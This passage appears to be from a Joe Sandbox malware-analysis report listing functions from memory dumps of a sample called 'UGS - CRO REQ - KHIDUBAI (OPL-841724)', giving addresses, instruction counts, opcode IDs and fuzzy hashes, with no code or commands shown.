String ID:
API String ID:
Opcode ID: 96fa1400cfb94b881013de1ea36f1edf0e8a47053eec4a9a2da97b910ae73824
Instruction ID: 88b8988e479700cda1d63260fb9065440dab9f9ca0bbd9f00886fc039f2748e6
Opcode Fuzzy Hash: 96fa1400cfb94b881013de1ea36f1edf0e8a47053eec4a9a2da97b910ae73824
Instruction Fuzzy Hash: 04419435B006448FC704DB6DD9909AEBBF5EF89310B15C5AAE409DB362DB31EC46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01F1AD80 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: def2a44d0475185ac42ebd0ac157a3219edf7a168fe0cf388dc763b01e3158c7
Instruction ID: 9af7b28f9330eb7011a9c1cf14c347666dc531188716d685879a8350b82b86de
Opcode Fuzzy Hash: def2a44d0475185ac42ebd0ac157a3219edf7a168fe0cf388dc763b01e3158c7
Instruction Fuzzy Hash: 4A5195B0E01248DFDB18DFBAD594AADBBB2BF88304F20816AD415AB365DB359945CF40

Uniqueness

Uniqueness Score: -1.00%

Function 01F1FE20 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bd357ae45a7103edc24a363f04b35600130d7d230ec92b7ccae489d27273cac
Instruction ID: 6e0e2c5a4c1b78a62d2240af48475837046ce6a5abe2268732d00dcbe3410cc8
Opcode Fuzzy Hash: 7bd357ae45a7103edc24a363f04b35600130d7d230ec92b7ccae489d27273cac
Instruction Fuzzy Hash: C131F636A10144DFCB09DF68D888EA9BBB2FF48724B1640A9E6099F372C731ED55CB40

Uniqueness

Uniqueness Score: -1.00%

Function 046AAAE8 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 262b9d9d74a656726f6c39e659457f95b7ce1125d6004588362b9fb80e8de33d
Instruction ID: 57b43fcbe8e9f89f5db797753b9b4dbdfa5f4df2864799089f3f81d40b81a907
Opcode Fuzzy Hash: 262b9d9d74a656726f6c39e659457f95b7ce1125d6004588362b9fb80e8de33d
Instruction Fuzzy Hash: 49416971A00A158FDB14DFA5C844AAEBBF6FF88701F00852AD415E7294E734AD59CF90

Uniqueness

Uniqueness Score: -1.00%

Function 046A7B58 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 007f7824e7cc1a5c20792a64ac48dfca702f31f9ac15a6d4010a744e9f8645dd
Instruction ID: 279ef229dae341d36687f0619b60c7bb74dd40b12eaa96c4726c9ac6ce196c32
Opcode Fuzzy Hash: 007f7824e7cc1a5c20792a64ac48dfca702f31f9ac15a6d4010a744e9f8645dd
Instruction Fuzzy Hash: 324146B4E01608DFCB04DFA9D8846AEBBF2FB88301F148165D415A7354EB79AA46CF50

Uniqueness

Uniqueness Score: -1.00%

Function 046AB4A1 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e337d64e645d7fa110f3a1effa4200e73c90f2cbb25d215bca370a336e50fc77
Instruction ID: a9ea3d1c342056da4ef2440bbb450910292af5376896bf47a89b29c8c4759ecb
Opcode Fuzzy Hash: e337d64e645d7fa110f3a1effa4200e73c90f2cbb25d215bca370a336e50fc77
Instruction Fuzzy Hash: B941E374A016288FEB24DF64C890FA9B7B1BB59720F1005D9EA09AB3D1E631ED91CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01EF1537 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0c18f92d59f0509b4fec17f3cad9089d930299c5d52a144aaeae970818ad8f4
Instruction ID: f504b45ca0e49751199c1deda68faed076a5f99ae7a76d5d16ae191e4d592014
Opcode Fuzzy Hash: b0c18f92d59f0509b4fec17f3cad9089d930299c5d52a144aaeae970818ad8f4
Instruction Fuzzy Hash: 9C313B35A10218DBDB04DBA4DC55AEEBBB6FF88310F148169D911B73A0CB719D05CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0015D006 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356184416.000000000015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0015D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15d000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 954716138bd8ad60acd916b953413041ea0b70b9ed4f78faf9c8f0f42f88a4d0
Instruction ID: 06aa4f8010f72d83ca8609e0b76e75344e6e50435b957a429ca10db4b1a115e8
Opcode Fuzzy Hash: 954716138bd8ad60acd916b953413041ea0b70b9ed4f78faf9c8f0f42f88a4d0
Instruction Fuzzy Hash: 1A314A7150E3C48FCB138F60D9A4715BF71AB57214F2985DBD8858F2A7C329981ECB62

Uniqueness

Uniqueness Score: -1.00%

Function 046A7B68 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a618a078d7e640d8640b6ba2368e97d80378e00e6f69c10448d43602814449a
Instruction ID: 0b55911ded20bd20f3c8ff46321b8d973fc31495000fe008390cb1933e4b4bae
Opcode Fuzzy Hash: 5a618a078d7e640d8640b6ba2368e97d80378e00e6f69c10448d43602814449a
Instruction Fuzzy Hash: 5F3146B4E01608DFCB04DFAAD8846AEBBF2FB88301F148165D419A7354EB74AE46CF50

Uniqueness

Uniqueness Score: -1.00%

Function 046A6AB0 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1608f2d1415fe5bab98781393d6a5ed02c6fa203fc869d8d18388d949eb7c3b0
Instruction ID: d54107d518a7cb7769509f29dc03c9497915ddb2ae659c84a18a5dca5eba814f
Opcode Fuzzy Hash: 1608f2d1415fe5bab98781393d6a5ed02c6fa203fc869d8d18388d949eb7c3b0
Instruction Fuzzy Hash: 5031F174E05208CFDB00CFA9D944BEEBBB1EB88301F188069D455B7390E775AA69CF50

Uniqueness

Uniqueness Score: -1.00%

Function 046A72BF Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93235ffd998ec877108e5587922cef906c280667f10fd98a5dd916b249edb2f1
Instruction ID: c719ba360f1ac0dc268bf1048e3eec33a1795e46300c77d0b370145c28b7ecd4
Opcode Fuzzy Hash: 93235ffd998ec877108e5587922cef906c280667f10fd98a5dd916b249edb2f1
Instruction Fuzzy Hash: 10311570A05A08CFDB10CF99D584BADBBF2FF89306F159069E805AB255E774AD95CF00

Uniqueness

Uniqueness Score: -1.00%

Function 046A6CC0 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08392d4c93110887141cd6ef95cdaab2f0173abdc7b81df7805ddb51fcfb6753
Instruction ID: d06537ec726fb76ddc1d465ba9773892539857253965522925868b3224546dda
Opcode Fuzzy Hash: 08392d4c93110887141cd6ef95cdaab2f0173abdc7b81df7805ddb51fcfb6753
Instruction Fuzzy Hash: 2B312270E006098FCB04DFA9D948AEEBBB2BF88350F08816AD465A7250E770A955CF90

Uniqueness

Uniqueness Score: -1.00%

Function 046ACDD0 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8929c544a68979e6013cb0cc21a1417ad76a8840fdd253f2813177bffe625a7
Instruction ID: e5cc5a6d4ba5eefbc049848fb62817c8378d0a318df5393096195e011add8f28
Opcode Fuzzy Hash: d8929c544a68979e6013cb0cc21a1417ad76a8840fdd253f2813177bffe625a7
Instruction Fuzzy Hash: B2318934600B049FDB29AF29D44496EBBB6FF95715B10496CE8128B3A5EF31EC06CF50

Uniqueness

Uniqueness Score: -1.00%

Function 046A67F9 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d353f0d381ff41661d3bd0c5766f644fad6e500182b9fb31aa2d9a0ca8c254f0
Instruction ID: 34f8e6510c8f8a01847606ab7b6fbba69d69ebce58acd889943ab363cb94de56
Opcode Fuzzy Hash: d353f0d381ff41661d3bd0c5766f644fad6e500182b9fb31aa2d9a0ca8c254f0
Instruction Fuzzy Hash: 10313A74E012189FCB09DFA8D8516EEBBB2FF88310F14816AD816A7364DB355D41CF91

Uniqueness

Uniqueness Score: -1.00%

Function 046AF798 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 349e1f6dea124d1bd501a55a02e1d416adf39cb079e68577c22e2e56bc6beeca
Instruction ID: ff587383fa5d601ba7600d26f1af95b22bdef300818a1f831bd0fc325c9a0a45
Opcode Fuzzy Hash: 349e1f6dea124d1bd501a55a02e1d416adf39cb079e68577c22e2e56bc6beeca
Instruction Fuzzy Hash: F8318F31300A049FDB28CF29D884AAE7BB5FF94755F048529F8058B2A1D770EC91CF91

Uniqueness

Uniqueness Score: -1.00%

Function 046AF790 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41f2c0d3be81cd20610b60a69809b7bad228e0e001b36da982686530063c570e
Instruction ID: bbdf4da702040d75a4a2dd7a391ffa4f43ceccfda178af90990a5ae4a04b6c70
Opcode Fuzzy Hash: 41f2c0d3be81cd20610b60a69809b7bad228e0e001b36da982686530063c570e
Instruction Fuzzy Hash: 3E316D31300A059FDB18CF29D884AAE7BA5EF58345F148569F8058B2A1DB74ECA1CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01F1DBF0 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2c3e564747f85df23435deac0b34a0e8f8fe135ae8ad65d838d5b3d8572d968
Instruction ID: 6714da2df02433f882a898a261d2599856d2e765a2dea1b182496a2b21ad2867
Opcode Fuzzy Hash: d2c3e564747f85df23435deac0b34a0e8f8fe135ae8ad65d838d5b3d8572d968
Instruction Fuzzy Hash: C9210A31700610DFD7218BADE888A6ABBF9EFC0364B15897AD10DC7656DB72EC41C750

Uniqueness

Uniqueness Score: -1.00%

Function 01EF1710 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c4f941c47d8a2e2351296b48ac365c815162d51ef266257be8fab6f301fa0e7
Instruction ID: 275a59743ad7124765a7e5b29c5e87068554d1e76606b580257a658041f2b9e2
Opcode Fuzzy Hash: 7c4f941c47d8a2e2351296b48ac365c815162d51ef266257be8fab6f301fa0e7
Instruction Fuzzy Hash: 0B21B3753406059BD719AB28D858A3E77A3EFC4754B10812DEA0A8B3A4CF36ED43C7C5

Uniqueness

Uniqueness Score: -1.00%

Function 01EF2200 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce002a18afcf92786a0a8fbf3b3d2502699c767003627ba085a01659513440ee
Instruction ID: 9f5b15a3a31dead1ca6ea936329dcb8b57c79c1bfe045c2432a2e25f43f7f8c9
Opcode Fuzzy Hash: ce002a18afcf92786a0a8fbf3b3d2502699c767003627ba085a01659513440ee
Instruction Fuzzy Hash: BF218874B00A0ACFCB01EFA9D5544AEF7B5FF89700B10452AD506A7324EF749A46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01EF21E4 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b688a944d98410e3117ccc5f3570c5873e98ef5831126b4022b1609003014a40
Instruction ID: e6df2cea783e68aab77538e8311a7a9f5b6fad714ff88a18a70c494cd4a625bd
Opcode Fuzzy Hash: b688a944d98410e3117ccc5f3570c5873e98ef5831126b4022b1609003014a40
Instruction Fuzzy Hash: 9C21B674E0060A8FCB00EFB8D4449AEBBF1FF99300B00466AD61697364EB359A06CB91

Uniqueness

Uniqueness Score: -1.00%

Function 046ACB70 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61271f64b1eb2252594fecbc79d74c1fc6b900b1bdc16d496b54b8ec8741bc0e
Instruction ID: 9a1b9dc82d319b5e839d33f1a3af48ccdea3a8a4f09195037ba6a88c50bbf17d
Opcode Fuzzy Hash: 61271f64b1eb2252594fecbc79d74c1fc6b900b1bdc16d496b54b8ec8741bc0e
Instruction Fuzzy Hash: 81217A71A00609DFDB10DFB8D504BAEBBF4AB04340F108066D909DB290F634EE65CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0015D044 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356184416.000000000015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0015D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15d000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec32cc5566413ef69310a8c6991a124c99a39a4f0aa62c2c07a7257336a337c3
Instruction ID: cc76a65f4fa73f771cf075a14be77f34388583a390288a1d94b7ff7a12a845ce
Opcode Fuzzy Hash: ec32cc5566413ef69310a8c6991a124c99a39a4f0aa62c2c07a7257336a337c3
Instruction Fuzzy Hash: DD21F2B2604244EFDB25CF14E9C0B26BB65EB84715F34C5A9EC054F286C736D84ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 01F1D018 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56d8ad0dd33a519a2118f125ee8442d614bccf9aba015277b8c68888b5b38ef5
Instruction ID: 305d65761c658de4591700aadd210ea27b3193dc7dbc8dc73d0112a673c15dea
Opcode Fuzzy Hash: 56d8ad0dd33a519a2118f125ee8442d614bccf9aba015277b8c68888b5b38ef5
Instruction Fuzzy Hash: B7211A3AA00509EFCB15DFA8E848C9DBBB1FF89314B0181A9E6169B271D731E855DF50

Uniqueness

Uniqueness Score: -1.00%

Function 046AFC10 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892978e048bc81d2a27bdbd0b657d0832ea126a403acf29bc6578dad4f4fa73b
Instruction ID: c65a6b016ed46ecdd59180ca40ce3f64b5f5c4495b520ea5835b766785e86662
Opcode Fuzzy Hash: 892978e048bc81d2a27bdbd0b657d0832ea126a403acf29bc6578dad4f4fa73b
Instruction Fuzzy Hash: F02165B2E042089FCB19DFA5D4548DEBBF8EF59310F018167E516DB2A1F630AD05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01EF46A8 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbdb928043cf1bf4e78099cb59fde3ef1d19bf96c0d728db9f1a66551484b67d
Instruction ID: ac538d9a061027afe88795793e0051cf990bbeb09bb3e51d031954ee2df05d26
Opcode Fuzzy Hash: fbdb928043cf1bf4e78099cb59fde3ef1d19bf96c0d728db9f1a66551484b67d
Instruction Fuzzy Hash: 992103B6E04748DFC702EBA8D4044DEBBB0BF96220B1581AAC615D72A1F7304909CF61

Uniqueness

Uniqueness Score: -1.00%

Function 01F13EC0 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3df545913ce3d66e2f45f97953b40351ba0834aed0f4d5d5137c6373071ff32
Instruction ID: d253edc4988c525fae303174d5be278c7b21125c4e31a9d5a1644c572dc7b37c
Opcode Fuzzy Hash: c3df545913ce3d66e2f45f97953b40351ba0834aed0f4d5d5137c6373071ff32
Instruction Fuzzy Hash: 3C218C75D05209CFDB08DFA9D8482EEBBF1FB88320F04846AD445B3298D7751A46CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 046AFC29 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9f4e276c68f69528c3313b34220e0cdea095cf6a8fb02c79616c5d869a07110
Instruction ID: 06efb75003fa5b3abd72f94c6450df1476ea594e2a40cc5c023a6ec7e5c5b1d5
Opcode Fuzzy Hash: f9f4e276c68f69528c3313b34220e0cdea095cf6a8fb02c79616c5d869a07110
Instruction Fuzzy Hash: 0B215772A042089FC719DFA4D454CDEBBF9FF89310F01456AE516D7261E630AD05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01EFE058 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5781a37dbe2f950cc19ad2fb71436beb820c9724de7b8bb4c0c87166287d06f6
Instruction ID: fb9f966dab259466a3ae86a485f89517b5a67f3720303a271dbc46275aff4b49
Opcode Fuzzy Hash: 5781a37dbe2f950cc19ad2fb71436beb820c9724de7b8bb4c0c87166287d06f6
Instruction Fuzzy Hash: 5731F470A42218CFEB64DF19C8887EDB7F2AF4A304F5551E9CA48A7260CB716AC0CF41

Uniqueness

Uniqueness Score: -1.00%

Function 046A96B1 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27fb87c099bb195d018c27cb806b9de0bff87b50f8c6619821b851fae8cc8bb4
Instruction ID: 7fabd2bafb01e8c00c15d93108610b36d2301fac9869aea21d216eea89f3b357
Opcode Fuzzy Hash: 27fb87c099bb195d018c27cb806b9de0bff87b50f8c6619821b851fae8cc8bb4
Instruction Fuzzy Hash: F3215E75A006189FCB14DF69C448ADD7BB2FF8C320F148669E811A7394DB759C46CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 01F13ED0 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c9170512df10fa313c6d51c197858ff0e5a9fd5a89cc6068ab2a43dbfc8db5b
Instruction ID: f85f0acd3d350f6c23f525a4b07edd5dd2dd5f07501466229445eb530a37eebb
Opcode Fuzzy Hash: 1c9170512df10fa313c6d51c197858ff0e5a9fd5a89cc6068ab2a43dbfc8db5b
Instruction Fuzzy Hash: 9A216A75D00209CFDB08DFA9D8482EEBBF6FB88320F048429D445B3248D7751A42CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01F1B4F0 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8f6290bd30f8d59b4cace91ae16747faced74a564b10d552e89a098747790b2
Instruction ID: 8b6bac0837ff248d3cab40478cd410b400f5b62dba429240f8178580d22eb45a
Opcode Fuzzy Hash: a8f6290bd30f8d59b4cace91ae16747faced74a564b10d552e89a098747790b2
Instruction Fuzzy Hash: F02114B4E0420ACFCB14DFA9D4856AEBBB6FF88300F14C5A9C815A7359D7369981CF91

Uniqueness

Uniqueness Score: -1.00%

Function 01F1B490 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce4c6af4c063f32ae798813e7066fe75f5170dd67dac2c875cb15845a5334f59
Instruction ID: 525cab019c805f07d6bad20289723b9c3d00d86f538254c2fee82223b9beba28
Opcode Fuzzy Hash: ce4c6af4c063f32ae798813e7066fe75f5170dd67dac2c875cb15845a5334f59
Instruction Fuzzy Hash: 96215870E09248DFDB04DFA9D8846ADBFB5EF89310F1482AAC459973A9D7368981CF41

Uniqueness

Uniqueness Score: -1.00%

Function 046A8C39 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d272c37d2157913c8839f8c5376a698a658555e229f51b6c1c54721ad6048c59
Instruction ID: eab8763bd01bf3a85dced40c118b73fd2bddba6b7979c19c9f4cdcdc3479b79a
Opcode Fuzzy Hash: d272c37d2157913c8839f8c5376a698a658555e229f51b6c1c54721ad6048c59
Instruction Fuzzy Hash: A921D4707003045FD764EB69D8057AE7BF5EFC4310F50893DE01AD7689DB75A9068B90

Uniqueness

Uniqueness Score: -1.00%

Function 01EF0E48 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c19a4c75e5a39318f854896458a41e1177ff37a0f1bc81d6e2c1b24adce89ca7
Instruction ID: 0f5c162be725de2bbe80e95e40273652228ddc9e7b95fa2c23723744f68728e5
Opcode Fuzzy Hash: c19a4c75e5a39318f854896458a41e1177ff37a0f1bc81d6e2c1b24adce89ca7
Instruction Fuzzy Hash: 1121CD30B006058FCB15EF68D884AAEB7F2EFC9310F15416AE506D73A5DB71AD46CB61

Uniqueness

Uniqueness Score: -1.00%

Function 01F1F3D7 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

